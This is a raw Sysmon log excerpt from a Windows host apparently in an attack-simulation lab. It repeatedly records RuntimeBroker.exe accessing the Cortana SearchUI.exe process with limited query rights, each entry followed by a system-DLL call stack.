13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012839Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012838Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012837Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012836Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1528d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009 10341000x800000000000000012835Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000012834Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000012833Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11b6c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012832Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012831Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012830Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012829Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012828Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1528d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009 10341000x800000000000000012827Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000012826Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000012825Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11b6c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012824Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012823Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012822Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012821Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 